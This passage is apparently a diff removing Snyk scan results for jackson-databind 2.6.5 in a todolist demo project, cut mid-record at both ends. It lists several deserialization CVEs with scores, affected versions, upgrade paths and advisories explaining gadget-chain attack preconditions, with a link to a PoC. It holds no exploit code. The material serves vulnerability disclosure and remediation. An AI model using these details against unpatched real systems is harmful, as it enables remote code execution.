- "isPatchable": false,
- "name": "com.fasterxml.jackson.core:jackson-databind",
- "version": "2.6.5"
- },
- {
- "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407",
- "title": "Deserialization of Untrusted Data",
- "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "credit": [
- "Unknown"
- ],
- "semver": {
- "vulnerable": [
- "[2.9.0,2.9.9.2)",
- "[2.8.0,2.8.11.4)",
- "[,2.7.9.6)"
- ]
- },
- "exploit": "Not Defined",
- "fixedIn": [
- "2.9.9.2",
- "2.8.11.4",
- "2.7.9.6"
- ],
- "patches": [],
- "insights": {
- "triageAdvice": null
- },
- "language": "java",
- "severity": "high",
- "cvssScore": 8.1,
- "functions": [],
- "malicious": false,
- "isDisputed": false,
- "moduleName": "com.fasterxml.jackson.core:jackson-databind",
- "references": [
- {
- "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2",
- "title": "GitHub Comparison"
- },
- {
- "url": "https://github.com/FasterXML/jackson-databind/issues/2387",
- "title": "GitHub Issue"
- },
- {
- "url": "https://github.com/FasterXML/jackson-databind/issues/2389",
- "title": "GitHub Issue"
- },
- {
- "url": "https://github.com/FasterXML/jackson-databind/issues/2395",
- "title": "GitHub Issue"
- },
- {
- "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/",
- "title": "Snyk Blog"
- }
- ],
- "cvssDetails": [
- {
- "assigner": "NVD",
- "severity": "high",
- "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
- "cvssV3BaseScore": 7.5,
- "modificationTime": "2024-03-11T09:47:46.065762Z"
- },
- {
- "assigner": "Red Hat",
-
"severity": "high",
- "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
- "cvssV3BaseScore": 7.5,
- "modificationTime": "2024-03-11T09:48:35.581531Z"
- }
- ],
- "cvssSources": [
- {
- "type": "primary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "assigner": "Snyk",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-06T14:09:40.009523Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
- "assigner": "NVD",
- "severity": "high",
- "baseScore": 7.5,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-11T09:47:46.065762Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
- "assigner": "Red Hat",
- "severity": "high",
- "baseScore": 7.5,
- "cvssVersion": "3.0",
- "modificationTime": "2024-03-11T09:48:35.581531Z"
- }
- ],
- "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n",
- "epssDetails": {
- "percentile": "0.45827",
- "probability": "0.00116",
- "modelVersion": "v2023.03.01"
- },
- "identifiers": {
- "CVE": [
- "CVE-2019-14439"
- ],
- "CWE": [
- "CWE-502"
- ],
- "GHSA": [
- "GHSA-6fpp-rgj9-8rwc",
- "GHSA-gwp4-hfv6-p7hw"
- ]
- },
- "packageName": "com.fasterxml.jackson.core:jackson-databind",
- "proprietary": false,
- "creationTime": "2023-11-14T13:41:26.478840Z",
- "functions_new": [],
- "alternativeIds": [],
- "disclosureTime": "2019-07-29T12:40:42Z",
- "exploitDetails": {
- "sources": [],
- "maturityLevels": [
- {
- "type": "secondary",
- "level": "Not Defined",
- "format": "CVSSv3"
- },
- {
- "type": "primary",
- "level": "Not Defined",
- "format": "CVSSv4"
- }
- ]
- },
- "packageManager": "maven",
- "mavenModuleName": {
- "groupId":
"com.fasterxml.jackson.core",
- "artifactId": "jackson-databind"
- },
- "publicationTime": "2019-07-29T12:40:42Z",
- "severityBasedOn": "CVSS",
- "modificationTime": "2024-03-11T09:48:35.581531Z",
- "socialTrendAlert": false,
- "severityWithCritical": "high",
- "from": [
- "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT",
- "com.fasterxml.jackson.core:jackson-databind@2.6.5"
- ],
- "upgradePath": [
- false,
- "com.fasterxml.jackson.core:jackson-databind@2.7.9.6"
- ],
- "isUpgradable": true,
- "isPatchable": false,
- "name": "com.fasterxml.jackson.core:jackson-databind",
- "version": "2.6.5"
- },
- {
- "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664",
- "title": "Deserialization of Untrusted Data",
- "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C",
- "credit": [
- "Tatu Saloranta"
- ],
- "semver": {
- "vulnerable": [
- "[,2.6.7.4)",
- "[2.7.0,2.9.10.6)"
- ]
- },
- "exploit": "Proof of Concept",
- "fixedIn": [
- "2.6.7.4",
- "2.9.10.6"
- ],
- "patches": [],
- "insights": {
- "triageAdvice": null
- },
- "language": "java",
- "severity": "high",
- "cvssScore": 8.1,
- "functions": [
- {
- "version": [
- "[2.9.4,2.9.10.6)"
- ],
- "functionId": {
- "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java",
- "className": "SubTypeValidator",
- "functionName": "validateSubType"
- }
- }
- ],
- "malicious": false,
- "isDisputed": false,
- "moduleName": "com.fasterxml.jackson.core:jackson-databind",
- "references": [
- {
- "url": "https://github.com/FasterXML/jackson-databind/issues/2814",
- "title": "GitHub Issue"
- },
- {
- "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062",
- "title": "Medium Article"
- },
- {
- "url": "https://github.com/Kamimuka/cve-2020-24616-poc",
- "title": "PoC"
- }
- ],
- "cvssDetails": [
- {
- "assigner": "Red Hat",
- "severity": "high",
- "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "cvssV3BaseScore": 8.1,
-
"modificationTime": "2024-03-11T09:48:13.383929Z"
- },
- {
- "assigner": "NVD",
- "severity": "high",
- "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "cvssV3BaseScore": 8.1,
- "modificationTime": "2024-03-11T09:50:47.311633Z"
- }
- ],
- "cvssSources": [
- {
- "type": "primary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C",
- "assigner": "Snyk",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-06T14:04:03.282990Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "assigner": "Red Hat",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-11T09:48:13.383929Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "assigner": "NVD",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-11T09:50:47.311633Z"
- }
- ],
- "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n",
- "epssDetails": {
- "percentile": "0.85138",
- "probability": "0.01172",
- "modelVersion": "v2023.03.01"
- },
- "identifiers": {
- "CVE": [
- "CVE-2020-24616"
- ],
- "CWE": [
- "CWE-502"
- ]
- },
- "packageName": "com.fasterxml.jackson.core:jackson-databind",
- "proprietary": false,
- "creationTime": "2020-08-26T11:28:06.617646Z",
- "functions_new": [
- {
- "version": [
- "[2.9.4,2.9.10.6)"
- ],
- "functionId": {
- "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator",
- "functionName": "validateSubType"
- }
- }
- ],
- "alternativeIds": [],
- "disclosureTime": "2020-08-26T11:26:14Z",
- "exploitDetails": {
- "sources": [
- "Snyk"
- ],
- "maturityLevels": [
- {
- "type": "secondary",
- "level": "Proof of Concept",
- "format": "CVSSv3"
- },
- {
- "type": "primary",
- "level": "Proof of Concept",
- "format": "CVSSv4"
- }
- ]
- },
- "packageManager": "maven",
- "mavenModuleName": {
- "groupId": "com.fasterxml.jackson.core",
- "artifactId": "jackson-databind"
- },
- "publicationTime": "2020-08-26T14:27:29Z",
- "severityBasedOn": "CVSS",
- "modificationTime": "2024-03-11T09:50:47.311633Z",
- "socialTrendAlert": false,
- "severityWithCritical": "high",
- "from": [
- "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT",
- "com.fasterxml.jackson.core:jackson-databind@2.6.5"
- ],
- "upgradePath": [
- false,
-
"com.fasterxml.jackson.core:jackson-databind@2.6.7.4"
- ],
- "isUpgradable": true,
- "isPatchable": false,
- "name": "com.fasterxml.jackson.core:jackson-databind",
- "version": "2.6.5"
- },
- {
- "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445",
- "title": "Deserialization of Untrusted Data",
- "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C",
- "credit": [
- "Unknown"
- ],
- "semver": {
- "vulnerable": [
- "[,2.6.7.3)",
- "[2.7.0,2.7.9.4)",
- "[2.8.0,2.8.11.2)",
- "[2.9.0,2.9.6)"
- ]
- },
- "exploit": "Unproven",
- "fixedIn": [
- "2.6.7.3",
- "2.7.9.4",
- "2.8.11.2",
- "2.9.6"
- ],
- "patches": [],
- "insights": {
- "triageAdvice": null
- },
- "language": "java",
- "severity": "high",
- "cvssScore": 8.1,
- "functions": [
- {
- "version": [
- "[,2.7.9.4)",
- "[2.8.0,2.8.11.2)",
- "[2.9.0,2.9.6)"
- ],
- "functionId": {
- "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java",
- "className": "ObjectMapper",
- "functionName": "enableDefaultTyping"
- }
- }
- ],
- "malicious": false,
- "isDisputed": false,
- "moduleName": "com.fasterxml.jackson.core:jackson-databind",
- "references": [
- {
- "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1",
- "title": "GitHub Commit"
- },
- {
- "url": "https://github.com/FasterXML/jackson-databind/issues/2052",
- "title": "GitHub Issue"
- }
- ],
- "cvssDetails": [
- {
- "assigner": "Red Hat",
- "severity": "high",
- "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
- "cvssV3BaseScore": 7.3,
- "modificationTime": "2024-03-11T09:48:41.204259Z"
- },
- {
- "assigner": "NVD",
- "severity": "high",
- "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
- "cvssV3BaseScore": 7.5,
- "modificationTime": "2024-03-11T09:53:36.643590Z"
- }
- ],
- "cvssSources": [
- {
- "type": "primary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C",
- "assigner": "Snyk",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion":
"3.1",
- "modificationTime": "2024-03-06T13:58:45.496040Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
- "assigner": "Red Hat",
- "severity": "high",
- "baseScore": 7.3,
- "cvssVersion": "3.0",
- "modificationTime": "2024-03-11T09:48:41.204259Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
- "assigner": "NVD",
- "severity": "high",
- "baseScore": 7.5,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-11T09:53:36.643590Z"
- }
- ],
- "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n",
- "epssDetails": {
- "percentile": "0.81303",
- "probability": "0.00770",
- "modelVersion": "v2023.03.01"
- },
- "identifiers": {
- "CVE": [
- "CVE-2018-12022"
- ],
- "CWE": [
- "CWE-502"
- ],
- "GHSA": [
- "GHSA-cjjf-94ff-43w7",
- "GHSA-wrr7-33fx-rcvj"
- ]
- },
- "packageName": "com.fasterxml.jackson.core:jackson-databind",
- "proprietary": false,
- "creationTime": "2018-10-11T17:11:34.234921Z",
- "functions_new": [
- {
- "version": [
- "[,2.7.9.4)",
- "[2.8.0,2.8.11.2)",
- "[2.9.0,2.9.6)"
- ],
- "functionId": {
- "className": "com.fasterxml.jackson.databind.ObjectMapper",
- "functionName": "enableDefaultTyping"
- }
- }
- ],
- "alternativeIds": [],
- "disclosureTime": "2018-05-29T17:00:04Z",
- "exploitDetails": {
- "sources": [
- "Snyk"
- ],
- "maturityLevels": [
- {
- "type": "secondary",
- "level": "Not Defined",
- "format": "CVSSv3"
- },
- {
- "type": "primary",
- "level": "Proof of Concept",
- "format": "CVSSv4"
- }
- ]
- },
- "packageManager": "maven",
- "mavenModuleName": {
- "groupId": "com.fasterxml.jackson.core",
- "artifactId": "jackson-databind"
- },
- "publicationTime": "2018-10-11T17:00:03Z",
- "severityBasedOn": "CVSS",
- "modificationTime": "2024-03-11T09:53:36.643590Z",
- "socialTrendAlert": false,
-
"severityWithCritical": "high",
- "from": [
- "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT",
- "com.fasterxml.jackson.core:jackson-databind@2.6.5"
- ],
- "upgradePath": [
- false,
- "com.fasterxml.jackson.core:jackson-databind@2.6.7.3"
- ],
- "isUpgradable": true,
- "isPatchable": false,
- "name": "com.fasterxml.jackson.core:jackson-databind",
- "version": "2.6.5"
- },
- {
- "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446",
- "title": "Deserialization of Untrusted Data",
- "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C",
- "credit": [
- "Unknown"
- ],
- "semver": {
- "vulnerable": [
- "[,2.6.7.3)",
- "[2.7.0,2.7.9.4)",
- "[2.8.0,2.8.11.2)",
- "[2.9.0,2.9.5)"
- ]
- },
- "exploit": "Unproven",
- "fixedIn": [
- "2.6.7.3",
- "2.7.9.4",
- "2.8.11.2",
- "2.9.5"
- ],
- "patches": [],
- "insights": {
- "triageAdvice": null
- },
- "language": "java",
- "severity": "high",
- "cvssScore": 8.1,
- "functions": [
- {
- "version": [
- "[,2.7.9.4)",
- "[2.8.0, 2.8.11.2)",
- "[2.9.0, 2.9.6)"
- ],
- "functionId": {
- "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java",
- "className": "ObjectMapper",
- "functionName": "enableDefaultTyping"
- }
- }
- ],
- "malicious": false,
- "isDisputed": false,
- "moduleName": "com.fasterxml.jackson.core:jackson-databind",
- "references": [
- {
- "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737",
- "title": "GitHub Commit"
- },
- {
- "url": "https://github.com/FasterXML/jackson-databind/issues/2032",
- "title": "GitHub Issue"
- }
- ],
- "cvssDetails": [
- {
- "assigner": "Red Hat",
- "severity": "medium",
- "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
- "cvssV3BaseScore": 5.6,
- "modificationTime": "2024-03-11T09:47:14.962980Z"
- },
- {
- "assigner": "NVD",
- "severity": "critical",
- "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "cvssV3BaseScore": 9.8,
- "modificationTime": "2024-03-11T09:47:26.624837Z"
- }
- ],
-
"cvssSources": [
- {
- "type": "primary",
- "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C",
- "assigner": "Snyk",
- "severity": "high",
- "baseScore": 8.1,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-06T13:59:53.818908Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
- "assigner": "Red Hat",
- "severity": "medium",
- "baseScore": 5.6,
- "cvssVersion": "3.0",
- "modificationTime": "2024-03-11T09:47:14.962980Z"
- },
- {
- "type": "secondary",
- "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "assigner": "NVD",
- "severity": "critical",
- "baseScore": 9.8,
- "cvssVersion": "3.1",
- "modificationTime": "2024-03-11T09:47:26.624837Z"
- }
- ],
- "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", - "epssDetails": { - "percentile": "0.85803", - "probability": "0.01278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11307" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qr7j-h6gg-jmgc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:14:00.916831Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-10T17:10:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": 
"jackson-databind" - }, - "publicationTime": "2018-10-11T17:10:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:26.624837Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - 